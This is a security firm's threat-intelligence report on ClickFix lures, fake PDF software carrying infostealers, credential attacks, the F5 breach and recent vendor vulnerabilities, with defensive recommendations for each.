This week, for Cybersecurity Awareness Month, we briefed our clients on the most common threats facing every organization (hint: they tend to target users).
KEY TAKEAWAYS
Cybersecurity Awareness Month – ClickFix/FakeCAPTCHA/FileFix, fake software downloads, credential attacks, and an increase in vulnerabilities.
The F5 Incident – what we know and how to protect your organization.
Last year's Cybersecurity Awareness Month articles went back to basics, covering passwords and MFA, patching, logging, auditing, backups, and (mis)configurations. This year, we will take a look at some of the most common threats facing every organization today. These threats tend to target the end user, and oftentimes lead to devastating impact such as ransomware or data exfiltration if not remediated appropriately.
ClickFix / Fake CAPTCHA / FileFix
This style of attack has been around for well over a year now, but its usage by threat actors continues to increase, and is a popular way for threat actors to either gain initial access into an environment, or deploy infostealer malware. The attack occurs when a user visits either a compromised site (drive-by attack) or is tricked into visiting an attacker-controlled site via phishing or SEO abuse. The victim is then presented with a prompt similar to this:
If the victim follows the steps shown, this results in them opening the Run dialog box (oftentimes it will prompt to open PowerShell or CMD), pasting in malicious code, and then executing the malicious code. This sequence literally gets the target victim to run the malicious code on the threat actor's behalf. In most cases, this initial set of malicious code will download and execute a malicious file, establishing a foothold on that endpoint.
User awareness training is the most effective defense these threats. Additionally, user's ability to use the Windows Run command, as well as access to PowerShell or the Command terminal can be restricted via GPO.
Fake Software Downloads
Multiple malware campaigns in recent months have been aggressively pushing fake software downloads that come bundled with infostealer malware. Just last month, we detailed a campaign dubbed TamperedChef, which distributed malware via a free PDF tool called "AppSuite PDF Editor". Threat actors were able to widely distribute this fake PDF application through SEO and malvertising. Additionally, in order to allow the malware to spread as wide as possible before it was detected, the file had benign behavior for months before the malicious payload was finally triggered.
PacketWatch observed a similar campaign just last week with another PDF editor called "CrystalPDF". Similar to the AppSuite PDF editor, the download site for CrystalPDF was established in 2024, and only recently did the binary get reported as malicious.
Application allow-listing, or having a default-deny policy on software is the best defense against these threats. Users should only be allowed to run pre-approved software on their systems. Additionally, administrators should restrict permissions of regular user accounts. Regular users do not need to have administrative permissions on their systems.
Credential Attacks (from Infostealers)
Credential-based attacks have been surging, fueled by a massive increase (over 800%) of stolen credentials in 2025 versus the previous year. This stark increase in compromised accounts is tied to the increase in systems compromised with infostealer malware, delivered via the methods described above. These attacks are especially effective in environments that do not have multi-factor authentication (MFA) deployed.
Having fully up-to-date EDR solutions applied to every possible endpoint will help prevent execution of infostealers. Implementing MFA on every account that has remote authentication capabilities is the most effective control against credential attacks. Additionally, darkweb monitoring services can help identify compromised accounts so their credentials can be changed proactively.
Increase in CVEs, Increase in Scanning
2024 saw a record-breaking 40,009 vulnerabilities reported, and 2025 is trending to have even more. Unfortunately, many of these vulnerabilities reside in security tools that are supposed to protect the network and instead create open doors for threat actors to gain access. This includes devices such as firewalls, SSLVPNs, load balancers, secure access gateways, etc. With the increasing use of AI to write software, it is likely even more vulnerabilities will be introduced in the coming years.
Recent reports show threat actors are scanning the internet looking for vulnerable devices of Cisco, Fortinet, and Palo Alto, and vulnerable services such as RDP. This scanning activity can oftentimes precede a 0-day attack, where the threat actor exploits a previously unknown vulnerability that has no patch, or the scans can target recently disclosed vulnerabilities. Threat actors are able to weaponize and mass-exploit critical vulnerabilities in edge devices within 24-48 hours of disclosure.
Patching has always been an important aspect of cybersecurity, but in 2025, it is crucial to implement security patches as soon as possible. In addition to patching, organizations can reduce their attack surface by closing unused/unnecessary ports and services and removing management interfaces from the open internet.
Resources:
Last week on October 15, F5 disclosed details of a major network breach. As the week went by, security news feeds were alight with articles and notifications regarding this incident. This article attempts to summarize key points and findings so organizations can take appropriate actions to protect themselves.
In the security advisory published by F5 on October 15, they state that they learned a "highly sophisticated nation-state threat actor" maintained "long-term, persistent access to, and downloaded files from, certain F5 systems." This discovery was made in August 2025. The threat actor's persistent access included systems in product development and engineering knowledge management platforms. F5 also disclosed the threat actor exfiltrated files from these systems, including F5 BIG-IP source code, and information about undisclosed vulnerabilities in the BIG-IP platform.
Per F5's advisory, they found no evidence of modification to their software supply chain, which includes source, build, and release pipelines, no evidence of access to NGINX, F5 Distributed Cloud Services, or Silverline environments, and no evidence of access to F5 CRM, financial, support case systems, or iHealth. However, it was determined that configuration and implementation information for a small percentage of customers was exfiltrated, and those customers have been notified directly by F5.
Administrators are strongly urged to review the F5 Quarterly Security Notification and apply all applicable patches as soon as possible. Additionally, F5 updated the "Hardening Your F5 System" guide with up-to-date guidance. These best practices should be reviewed and implemented in order to reduce the potential attack surface of F5 systems. Lastly, CISA published mitigation strategies for F5 devices. That advisory can be found here.
Resources:
Vulnerability Roundup
Last week, Oracle released an emergency patch for another vulnerability in their EBS platform. Tracked as CVE-2025-61884, the flaw is remotely exploitable without authentication, and successful exploitation can give the threat actor access to "sensitive resources" leading to information disclosure. The vulnerability affects Oracle EBS versions 12.2.3-12.2.14. Administrators are urged to patch as soon as possible, as this vulnerability and other recent vulnerabilities in this product are under active exploitation.
https://www.oracle.com/security-alerts/alert-cve-2025-61884.html
https://www.bleepingcomputer.com/news/security/oracle-silently-fixes-zero-day-exploit-leaked-by-shinyhunters/
https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-report-10-06-2025
On October 14, Microsoft released security updates for their fleet of products in their monthly Patch Tuesday. This particular set of patches stands out as it is the last security update for Windows 10. While it is highly recommended that all Windows 10 endpoints be upgraded to Windows 11 so they can keep receiving security updates, any devices in your environment that are still on Windows 10 should have these latest Patch Tuesday updates applied. It should also be noted that several vulnerabilities addressed in this round of updates have already been exploited in the wild, including CVE-2025-24052, CVE-2025-24990, and CVE-2024-59230 (all privilege escalation vulnerabilities).
https://www.tenable.com/blog/microsofts-october-2025-patch-tuesday-addresses-167-cves-cve-2025-24990-cve-2025-59230
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-24052
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-24990
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-59230
On October 14, Veeam published a security bulletin detailing a set of vulnerabilities affecting Veeam Backup & Replication. Two of the vulnerabilities, CVE-2025-48983 and CVE-2025-48984, are rated critical and allow for remote code execution on the Backup Server. It should be noted that these vulnerabilities can only be exploited by "an authenticated domain user". Backup servers that are not domain-joined are not impacted by these vulnerabilities. Veeam Backup & Replication version 12.3.2.3617 and all earlier version 12 builds are vulnerable.
Additionally, the bulletin addresses CVE-2025-48982, a local privilege escalation vulnerability in Veeam Agent for Microsoft Windows. This vulnerability affects Veeam Agent for Microsoft Windows version 6.3.2.1205 and all earlier version 6 builds.
Last week, SAP rolled out 13 fixes for their October Security Patch Day. Among these fixes is a patch for a maximum severity insecure deserialization vulnerability in SAP NetWeaver. Tracked as CVE-2025-42944, it allows an "unauthenticated attacker to exploit the system through the RMI-P4 module by submitting a malicious payload to an open port." This vulnerability was actually addressed in the September Patch Day, but this new set of fixes applies additional hardening measures. Administrators are urged to apply the new patches as soon as possible.
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/october-2025.html
https://thehackernews.com/2025/10/new-sap-netweaver-bug-lets-attackers.html
Two high-severity issues, tracked as CVE-2025-11001 and CVE-2025-11002 have been addressed by 7-Zip. Both vulnerabilities can be exploited in the same way, where a threat actor sends the victim a malicious archive file. If the victim opens the file, the vulnerabilities allow the process to write files outside of the intended destination folder, which lets the threat actor place malicious files or payloads in potentially sensitive system locations. These vulnerabilities affect all 7-Zip versions before version 25.00. Administrators are urged to patch as soon as possible.
On October 13, Ivanti released a security advisory detailing 13 high and medium-severity vulnerabilities in their Endpoint Manager solution. Successful exploitation of these vulnerabilities can lead to privilege escalation or remote code execution. This set of vulnerabilities affects Ivanti Endpoint Manager versions 2024 SU3 Sr1 and prior, as well as 2022 SU8 SR2 and prior (this version is end-of-life). Administrators are urged to apply these patches as soon as possible, as Ivanti vulnerabilities are frequently targeted by ransomware and extortion groups.
The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:
This report is provided FREE to the cybersecurity community.
Visit our Cyber Threat Intelligence Blog for additional reports.
Subscribe to be notified of future Reports:
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.